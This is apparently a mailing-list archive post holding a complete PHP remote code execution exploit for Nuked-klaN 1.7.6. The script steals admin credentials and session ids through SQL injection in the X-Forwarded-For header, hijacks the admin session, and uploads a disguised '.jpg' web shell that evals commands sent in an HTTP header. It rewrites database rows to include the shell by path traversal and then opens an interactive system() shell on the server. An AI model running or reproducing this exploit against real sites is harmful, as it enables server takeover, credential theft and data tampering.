<<< Date Index >>>     <<< Thread Index >>>

Nuked-klaN 1.7.6 Remote Code Execution Exploit



<?php
#
#  Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <gmdarkfig@xxxxxxxxx>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
require("phpsploitclass.php");     # If you want to use this class, the latest
                                   # version can be downloaded from 
acid-root.new.fr.

$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = '';                     # proxy <proxyip>:<proxyport>
$pra = '';                     # basic authentification <proxyuser:proxypwd>

$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

$config    = array();
$config[]  = 'nuked';                 # table prefix
$config[]  = 'nuked';                 # cookie prefix
$config[]  = 'ORDER by date LIMIT 1'; # sql conditions
$config[]  = 'HAK';                   # match, length <= 3
$config[]  = '<?php'."\n"             # php code
            .'error_reporting(0);'
            .'if(isset($_SERVER[HTTP_SHELL]))'
            .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}'
            .'else 
{include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';

$request   = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users 
$config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users 
$config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users 
$config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE 
user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";

for($i=0;$i<count($request);$i++)
{
        $deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT(";
        $sql = $deb.$request[$i]."))) #";
        $xpl->addheader("X-Forwarded-For",$sql);
        $xpl->get($url);
        $xpl->reset('header');
}

if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
  die("Exploit Failed");

$what = array("login","passwd","user_id","session");
for($i=0;$i<count($what);$i++)
   print "\n".$what[$i]." -> ".$matches[2][$i];

if(empty($matches[2][3]))
  exit("\nNo session found");

# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);

$phpc = array(
frmdt_url   => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));

$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');

if(!preg_match('#\<input name=\"photo\" 
value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";

$sql   = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) 
CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE 
name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET 
type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";

for($i=0;$i<count($sql);$i++)
   $xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
    # 0'); include('./conf.inc.php'); print $global['db_pass']; //
    $xpl->reset('header');
    $xpl->addheader('Shell',"system('$cmd');");
    $xpl->get($url);
    $data = explode('123456789',$xpl->getcontent());
    print $data[1]."\n\$shell> ";
}

function char($data)
{
        $char='CHAR(';
        for($i=0;$i<strlen($data);$i++)
        {
                $char .= ord($data[$i]);
                if($i != (strlen($data)-1)) $char .= ',';
        }
        return $char.')';
}
?>